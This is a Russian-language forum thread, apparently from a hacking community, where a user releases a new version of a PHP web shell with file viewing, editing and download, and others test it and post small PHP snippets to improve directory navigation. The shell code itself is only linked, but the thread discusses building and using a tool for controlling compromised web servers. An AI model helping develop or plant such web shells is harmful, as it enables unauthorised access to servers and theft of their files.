Может кто и помнит мой первый релиз античат шелла. Но не суть.Вот новая версия. Пока что еще сырой но вообщем уже добавлен достаточно удобный вьювер и редактор файлов. Плюс довнлоад файлов.Смотрим тестируем высказываемся предлогаем и так далее.Все здесь или в пм. ссылка http://sec.antichat.org/antichat.txt
Нормально, но можно было бы и вьювер при старте показывать =)... Тока не хорошо, что диск A: постоянно кричит при переходе из папки в папку... Добавли потом: и еще... задай форму для быстро перехода в каталог... Убери регистрацию или поставь куки...
Forbidden You don't have permission to access /antichat.txt on this server. Apache/1.3.33 Server at sec.antichat.org Port 80
Чем вам существующие не подуше ? Может зальете куда-нить на покраканый сервер - чтобы можно было поглядеть-полазить.
Не соглашусь, что это "велосипед" ибо свое оно всегда лучше , потому что знаешь что сработает и сработает как надо. =)
Brahma, тем что они многа весят поставь Denwer - http://denwer.ru залей antichat.php в Z:\\home\localhost\www\ зайди на http://localhost/antichat.php - лазай, гляди и покракивай скока твоей душе угодно а ес непонравица шо будет диск A запрашивать найди строчку PHP: for ($j=ord('A'); $j<=ord('Z'); $j++) и замени на PHP: for ($j=ord('C'); $j<=ord('Z'); $j++)
да когда я его написал я совсем забыл про диск а): ведь от него я избавился примерно года 3 назад Сори.Сорс был действительно недоступен на то были свои причины.Уже все доступно исправлены те глюки что сказаны выше.Теперь при старте открываеться вьювер.
Дык какой быстрый переход вроде все и так нормально реализовал Где дальнейшие предложения..Кстати еще на счет моего проекта домейн сканер у кого есть база доменов?
Я имею ввиду добавить это: Заменить PHP: $dir=chdir($dir); Помойму 111 линия =) на: PHP: //My $direct = $_POST['directory']; if (isset($direct)) { $dir=chdir($direct); }else { $dir=chdir($dir); } //End Добавить после 42 линии: HTML: <td><form method=POST>Open directory:<input type=text name=directory size=20></form>
Мда так ине понял bul.666 а тебе не кажеться что это не к чему $direct = $_POST['directory']; if (isset($direct)) { $dir=chdir($direct); }else { $dir=chdir($dir); ? Повнимательнее товарищи Зачем тогда я писал вот это вот? if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir']; а писал для того чтобы просто добавить <form method=POST>Open directory:<input type=text name=dir size=20></form> Уже добавил.Обновил. Исправил глюк со скачиванием фалов..И даже не кто не заметил Вот такие вот у нас бета тестеры блин header('Content-Type: application/octet-stream'); за место text/plain версия именуеться уже 1.3
Шелл неплохой, теперь буду им иногда пользоваться.. Во-первых, нормальный дизайн (правда зел. цвет надо немного изменить, чтоб был точь в точь как полоска вверху этого форума . Во вторых, он достаточно удобный, только надо, чтоб кнопочка execute на enter реагировала...
Читал в каком-то езиносе-ебзиносе обсирательском, коих сейчас как тараканов верные мысли по поводу "веб-шеллов". Нахера их столько плодить, тем более что функционал у большинства на нуле? А по-оригинальней ничего не хочется придумать?